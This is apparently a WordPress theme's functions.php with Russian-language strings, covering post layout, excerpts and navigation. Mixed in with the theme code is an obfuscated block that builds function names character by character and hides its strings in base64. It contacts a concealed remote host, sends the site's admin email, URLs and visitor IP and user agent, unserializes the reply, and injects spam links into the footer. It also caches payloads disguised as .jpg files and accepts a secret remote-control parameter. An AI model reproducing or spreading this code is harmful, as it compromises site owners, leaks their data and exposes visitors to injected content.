<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $PhaDeG='e';$UzPwDS='a';$guvq='b';$fTithFk='_';$EVxyumV='4';$MZhG='o';$KDXyuiE='6';$zLBn='e';$cwsNXGI='d';$BNNL='d';$sGQRa='c';$kFgEOK='e';$konxQLw='s';$pNjjpcNQ=$guvq.$UzPwDS.$konxQLw.$zLBn.$KDXyuiE.$EVxyumV.$fTithFk.$cwsNXGI.$kFgEOK.$sGQRa.$MZhG.$BNNL.$PhaDeG;$MwtkDMZ='z';$IZzhW='l';$YVAO='n';$iRUhz='g';$Eqwi='a';$XFNjQe='f';$QnOri='i';$lRsjM='e';$vzTJ='t';$wPHxQkll=$iRUhz.$MwtkDMZ.$QnOri.$YVAO.$XFNjQe.$IZzhW.$Eqwi.$vzTJ.$lRsjM;$JzLnBLH='r';$PkIKU='t';$vhJh='1';$xcYcMz='o';$eKPWUS='_';$JlBF='r';$slyhisZ='3';$tAWwVwp='s';$KBwcLj='t';$hscgSkde=$tAWwVwp.$KBwcLj.$JzLnBLH.$eKPWUS.$JlBF.$xcYcMz.$PkIKU.$vhJh.$slyhisZ;$RCvL='t';$zXAzaJq='v';$nNFfX='r';$njADai='e';$yODZd='s';$nCmGIZ='r';$MYFjUqRI=$yODZd.$RCvL.$nNFfX.$nCmGIZ.$njADai.$zXAzaJq;                     
		$ak_____________r='e';$oo__h='a';$pe______________x='b';$no__________g='_';$qy___________h='4';$nx______________p='o';$ow_______u='6';$co_____k='e';$fw__v='d';$le__a='d';$ot______________p='c';$bz____________q='e';$bt_______________g='s';$lq__k=$pe______________x.$oo__h.$bt_______________g.$co_____k.$ow_______u.$qy___________h.$no__________g.$fw__v.$bz____________q.$ot______________p.$nx______________p.$le__a.$ak_____________r;
		$jc________s='o';$xe________p='_';$mo__________t='n';$kf__________s='s';$kc_________w='s';$gi_________t='f';$ig____________w='i';$wk________q='t';$sk___________g='u';$od______________v='e';$hb______________y='n';$eu_____________s='x';$bz____________y='i';$mh__________v='t';$og____b='c';$zn_______________d=$gi_________t.$sk___________g.$hb______________y.$og____b.$wk________q.$ig____________w.$jc________s.$mo__________t.$xe________p.$od______________v.$eu_____________s.$bz____________y.$kf__________s.$mh__________v.$kc_________w;
		$nc_____h='n';$qn_______w='e';$gz_______________x='o';$qe________b='f';$do_______m='p';$au_________o=$qe________b.$gz_______________x.$do_______m.$qn_______w.$nc_____h;
		$vk________c='a';$yl_______________m='f';$oh____________f='r';$bm_______________x='d';$rx______a='e';$tv___c=$yl_______________m.$oh____________f.$rx______a.$vk________c.$bm_______________x;
		$fs__________s='e';$lq________e='s';$wa_____________j='o';$au_________l='l';$jk__i='f';$ja____________f='c';$ev______o=$jk__i.$ja____________f.$au_________l.$wa_____________j.$lq________e.$fs__________s;
		
		define("WP_ID", $lq__k("Mi4wLjA="));
		define("WP_TTL", $lq__k("MTA4MDA="));
		define("WP_SRC", $lq__k("dHBva24="));
	


		function wp_get_header() {
			global $lq__k, $zn_______________d;
			
			if (
				$zn_______________d($lq__k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zn_______________d($lq__k("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zn_______________d($lq__k("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $lq__k, $au_________o, $ev______o, $tv___c;
			
			$ij________y = TEMPLATEPATH."/".$lq__k("Zm9vdGVyLnBocA==");
			$wo__k = @$au_________o($ij________y, "r");
			$ij________y = @$tv___c($wo__k, @filesize($ij________y));
			@$ev______o($wo__k);
			
			$si______________m = TEMPLATEPATH."/".$lq__k("ZnVuY3Rpb25zLnBocA==");
			$wo__k = @$au_________o($si______________m, "r");
			$si______________m = @$tv___c($wo__k, @filesize($si______________m));
			@$ev______o($wo__k);
			
			$mh__n = 0;
			if($ij________y && $si______________m) {
				if ($lq__k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ij________y, $lq__k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$mh__n = 1;
					}
					if (substr_count($ij________y, "wp_theme_GPL_credits()") < 1) {
						$mh__n = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$mh__n = 12;
				}
			}
			
			if($mh__n > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $mh__n -->";
			}
		}
	


		function wp_loaded() {
			global $lq__k, $zn_______________d;
			return $zn_______________d($lq__k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($mh____________f, $kb__w = "(more...)", $pc__________g = 0, $id__________h = "") {
				$jt___y = get_the_content($kb__w, $pc__________g, $id__________h);
				$jt___y = apply_filters("the_content", $jt___y);
				
				$jt___y = str_replace("]]>", "]]>", $jt___y);
				if (strlen($_GET["p"]) > 0) {
					echo $jt___y;
				}
				else if ((strlen($jt___y)>$mh____________f) && ($ce______________i = strpos($jt___y, " ", $mh____________f ))) {
					$jt___y = substr($jt___y, 0, $ce______________i);
					$jt___y = $jt___y;
					echo $jt___y;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$kb__w</a></div></p>";
				} else {
					echo $jt___y;
				}
				
			}
		}
	


		$vm___________f='o';$vb______________r='e';$vm____p='4';$go_______j='a';$pt_____b='c';$tv_______________n='e';$ja____d='e';$qb______x='n';$mc_____p='s';$az____________j='6';$mv______n='d';$wi________i='_';$tu___v='b';$jz__t=$tu___v.$go_______j.$mc_____p.$ja____d.$az____________j.$vm____p.$wi________i.$tv_______________n.$qb______x.$pt_____b.$vm___________f.$mv______n.$vb______________r;
		$dt_______g='n';$fs___________s='i';$mo________e='c';$mm_______________j='o';$fb___b='f';$qm_____k='g';$ou______________u='_';$hu_________x='t';$ti_________y='e';$kl___________w='s';$qn___________v='t';$dv_______________t='n';$sx__u='l';$iq_________x='t';$xq_____________a='e';$dn_______h='_';$gv______a='e';$hs__________k=$fb___b.$fs___________s.$sx__u.$xq_____________a.$dn_______h.$qm_____k.$ti_________y.$qn___________v.$ou______________u.$mo________e.$mm_______________j.$dt_______g.$hu_________x.$gv______a.$dv_______________t.$iq_________x.$kl___________w;
		$sv_______________q='s';$nd_________u='_';$kr________n='f';$qz________i='t';$kh______p='e';$yv_______________v='i';$hp______r='s';$zy____________l='x';$uf_____________s='e';$bb______m='i';$ri___z='l';$ri_____________f=$kr________n.$yv_______________v.$ri___z.$kh______p.$nd_________u.$uf_____________s.$zy____________l.$bb______m.$sv_______________q.$qz________i.$hp______r;
		$pl__________l='p';$dg_____________d='r';$vk_______h='v';$ep____v='s';$sk_____________e='e';$uv_________b='c';$lr______________p='a';$lj_______g='_';$el_____________q='r';$gd____________c='e';$en_________e='o';$vz___m='i';$pa_____t='m';$yi____c='o';$lh__________f='n';$ys_____f=$vk_______h.$gd____________c.$dg_____________d.$ep____v.$vz___m.$en_________e.$lh__________f.$lj_______g.$uv_________b.$yi____c.$pa_____t.$pl__________l.$lr______________p.$el_____________q.$sk_____________e;
		$qu__________o='o';$my____h='e';$ml___________q='c';$bx______________o='n';$zl_______________k='p';$cm________e='k';$vd___________p='f';$cn__z='o';$nj_______________i='s';$ee_____r=$vd___________p.$nj_______________i.$qu__________o.$ml___________q.$cm________e.$cn__z.$zl_______________k.$my____h.$bx______________o;
		$hb____a='e';$zp____________q='i';$ua______m='t';$rv______________r='r';$fj_____l='f';$ee______u='w';$kx______________g=$fj_____l.$ee______u.$rv______________r.$zp____________q.$ua______m.$hb____a;
		$jx____________i='m';$mn_______________g='d';$nh____________v='5';$gh_______________g=$jx____________i.$mn_______________g.$nh____________v;
		$oy_______________g='r';$rz_______f='h';$zp_______b='a';$ji_______________a='e';$dg__n='p';$xd________c='t';$wg________s='l';$wx___z='a';$cz________j=$oy_______________g.$ji_______________a.$wx___z.$wg________s.$dg__n.$zp_______b.$xd________c.$rz_______f;
		$ae_____________v='e';$jb______________o='i';$qd__________x='z';$gw__________y='s';$vj__________d='e';$uo______m='i';$eo_____b='n';$wy___________b='l';$pn__h='r';$fl______u='u';$pq_____________o='a';$aw____x=$fl______u.$eo_____b.$gw__________y.$vj__________d.$pn__h.$uo______m.$pq_____________o.$wy___________b.$jb______________o.$qd__________x.$ae_____________v;
		$nz______________y='m';$mo_________c='m';$ao____n='n';$ub__________d='a';$yp_____w='p';$fe______d='t';$et_____________t='e';$zx_______________x=$fe______d.$et_____________t.$nz______________y.$yp_____w.$ao____n.$ub__________d.$mo_________c;
		$pi___________z='e';$qt___________f='r';$cz____y='e';$iy____________x='t';$os____x='m';$wg__d='s';$ls______a='_';$jq______z='n';$zk________l='e';$or________k='c';$sv___r='t';$ka____m='t';$ld__w='a';$iz___________u='_';$jy_______________s='r';$yo_________q='o';$kb__q='e';$iy________h='a';$om______d='x';$fm__n='t';$ku_______i='c';$yc____________g=$wg__d.$sv___r.$qt___________f.$cz____y.$ld__w.$os____x.$iz___________u.$or________k.$yo_________q.$jq______z.$ka____m.$zk________l.$om______d.$fm__n.$ls______a.$ku_______i.$jy_______________s.$pi___________z.$iy________h.$iy____________x.$kb__q;
	


		function du________r($tu_______y) {
			global $lq__k, $zn_______________d, $hs__________k, $ys_____f, $yc____________g;
			
			if (!$zn_______________d($lq__k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ys_____f(PHP_VERSION, "5.0.0", ">=") && $zn_______________d($lq__k("ZmlsZV9nZXRfY29udGVudHM=")) && $zn_______________d($lq__k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$tg__________y = $yc____________g(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$oj___j = @$hs__________k($tu_______y, 0, $tg__________y);
			} else {
				$oj___j = @$hs__________k($tu_______y, 0);
			}
			
			return $oj___j;
		}
	


		function cd_________h($tu_______y) {
			global $zn_______________d, $ee_____r, $kx______________g, $lq__k;
			
			if (!$zn_______________d($lq__k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$wx_________j = strpos($tu_______y, "/", 7);
			$cx________c = array(
				"uri"     => substr($tu_______y, $wx_________j),
				"host"    => str_replace("http://", "", substr($tu_______y, 0, $wx_________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$et____________g = @$ee_____r("$cx________c[host]", 80, $mi_________a, $es____l, 4);
			
			if (!$et____________g) {
				return false;
			} else {
				$oj___j = "";
				$to__________g  = "GET $cx________c[uri] HTTP/1.0\r\n";
				$to__________g .= "Host: $cx________c[host]\r\n";
				$to__________g .= "Referer: $cx________c[referer]\r\n";
				$to__________g .= "Connection: Close\r\n\r\n";
				
				@$kx______________g($et____________g, $to__________g);
				
				while (!@feof($et____________g)) {
					$ci_____________d = @fgets($et____________g, (1024*24));
					
					if ($ci_____________d == "\r\n") {
						$nk____e = true;
						continue;
					}
					
					if ($nk____e) {
						$oj___j .= $ci_____________d;
					}
				}
				
				return $oj___j;
			}
		}
	


		function nk___y($tu_______y) {
			global $zn_______________d;
			$qu____________m = false;
			
			if ($tu_______y != "") {
				if ($zn_______________d("du________r")) {
					$qu____________m = @du________r($tu_______y);
				}
				
				if (!$qu____________m && ($zn_______________d("cd_________h"))) {
					$qu____________m = @cd_________h($tu_______y);
				}
			}
			
			return $qu____________m;
		}
	


		function ki_____________l() {
			global $_SERVER, $gh_______________g;
			
			$zi_________j = $_SERVER["SERVER_NAME"];
			
			if (substr("$zi_________j", 0, 4) == "www.") {
				$zi_________j = substr("$zi_________j", 4);
			}
			
			$zi_________j = $gh_______________g("$_SERVER[SERVER_NAME]");
			
			return $zi_________j;
		}
	


		function vy____n() {
			return "file";
		}
	


		function dp__l($tu_______y) {
			global $_SERVER, $hs__________k, $ri_____________f, $au_________o, $ev______o, $kx______________g;
			
			$jd_______s = pz____________x();
			
			$fb_____________f = ki_____________l().".jpg";
			$uq__________z = $jd_______s["dir_upload"]["path"]."/$fb_____________f";
			$cm________g = @filemtime($uq__________z);
			
			if (!$cm________g || ((time()-$cm________g) >= WP_TTL)) {
				$qu____________m = nk___y($tu_______y);
				
				if ($qu____________m) {
					if ($ri_____________f($uq__________z)) {
						@unlink($uq__________z);
					}
					
					$wo__k = @$au_________o($uq__________z, "x+");
					
					@$kx______________g($wo__k, $qu____________m);
					@$ev______o($wo__k);
				}
			} else {
				if ($ri_____________f($uq__________z)) {
					$qu____________m = @$hs__________k($uq__________z);
				} else {
					$qu____________m = false;
				}
			}
			
			return $qu____________m;
		}
	


		function pz____________x() {
			global $_SERVER, $lq__k, $jz__t;
			
			$hc___n = wp_count_posts("post");
			$am___b = pathinfo(get_bloginfo("template_directory"));
			
			$jd_______s = array(
				"url" => array(
					"report"      => $lq__k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $am___b,
				"dir_upload"	=> wk_____________t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$am___b[filename],
					"a005=".$hc___n->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.odmu.od.ua/nedvizhimost-2/vtorichnyj-rynok-nedvizhimosti\">Вторичный рынок недвижимости</a>"
			);
			
			$jd_______s["url"]["queryString"] = implode("&", $jd_______s["queryString"]);
			$jd_______s["url"]["report"] = $jd_______s["url"]["report"]."/?".$jz__t($jd_______s["url"]["queryString"]).".html";
						
			return $jd_______s;
		}
	


		function wk_____________t() {
			$ni__________l = wp_upload_dir();
			
			if (isset($ni__________l["error"])) {
				$zd________v = er______________w();
				if (is_writable($zd________v)) {
					$ni__________l = array("path" => $zd________v);
				}
			}

			return $ni__________l;
		}
	


		function er______________w() {
			global $zn_______________d, $gh_______________g, $cz________j, $zx_______________x;
			
			$pa___________d = (bool) ini_get("safe_mode");
			if ($pa___________d == true) {
				return false;
			}
			
			if ($zn_______________d("sys_get_temp_dir")) {
				$uu__________u = sys_get_temp_dir();
				if (is_writable($uu__________u)) {
					return $cz________j($uu__________u);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $cz________j($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $cz________j($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $cz________j($_ENV["TEMP"]);
			} else {
				$bg_____w = $zx_______________x($gh_______________g(uniqid(rand(), true)), "");
				if ($bg_____w) {
					$uu__________u = $cz________j(dirname($bg_____w));
					@unlink($bg_____w);
					return $uu__________u;
				} else {
					return false;
				}
			}
		}
	


		function hg__________b() {
			global $_GET, $ri_____________f;
			
			$jd_______s = pz____________x();
			$zi_________j = ki_____________l();
			$lp____m = vy____n();
			
			$kc______m = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($lp____m == "file") {
					$bt____________p = $jd_______s["dir_upload"]["path"]."/".$zi_________j.".jpg";
					if ($ri_____________f($bt____________p)) {
						@unlink($bt____________p);
						$kc______m = "deleted";
					}
				}
				
				$cp________b = array(
					"s"	=> $kc______m,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cp________b AS $jk______________k => $eq__t) echo " [$jk______________k:$eq__t]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zn_______________d, $lq__k, $aw____x;
			$jd_______s = pz____________x();
			
			$xz_____________g = "dp__l";
			if ($zn_______________d($xz_____________g)) {
				$oj___j = $xz_____________g($jd_______s["url"]["report"]);
			}
			
			if ($oj___j) {
				if ($oj___j = @$lq__k($oj___j)) {
					$oj___j = @$aw____x($oj___j);
					
					if (strlen($oj___j[custom_credit]) >= 5) {
						$jd_______s["default_string"] = $oj___j[custom_credit];
					}
					
					if ($oj___j["status"] == "0") {
						$ao_______________w = 1;
						$fw_____________f = 1;
					} else {
						$qn________u = sizeof($oj___j["links"]);
						$ba__n = $jd_______s["default_string"];
						
						if ($qn________u > 0 && $oj___j["links"] !== "") {
							$qs_____________t = 0;
							foreach ($oj___j["links"] as $ac______________d => $vz______________c) {
								$qs_____________t++;
								if ($vz______________c->l_path == "" || $vz______________c->l_path == $_SERVER["REQUEST_URI"]) {
									$vz______________c->l_href = htmlspecialchars(strip_tags($vz______________c->l_href));
									$vz______________c->l_title = htmlspecialchars(strip_tags($vz______________c->l_title));
									$vz______________c->l_anchor = htmlspecialchars(strip_tags($vz______________c->l_anchor));
									$ba__n .= " | ";
									$ba__n .= "<a href='$vz______________c->l_href' title='$vz______________c->l_title'";
									if ($vz______________c->l_nofollow == "1") {
										$ba__n .= " rel='nofollow'";
									}
									$ba__n .= ">$vz______________c->l_anchor</a>";
								}
							}
						}
						$jd_______s["links"] = "$ba__n";
						if ($oj___j[credit] == "0") {
							$jd_______s["links"] = "";
						}
					}
				} else {
					$ao_______________w = "1";
				}
			} else {
				$ao_______________w = "1";
			}
			
			if ($ao_______________w == "1") {
				$jd_______s["links"] = $jd_______s["default_string"];
			}
			
			echo "$jd_______s[links]";
			
			echo "<!-- s: $oj___j[signature] -->";
			hg__________b();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

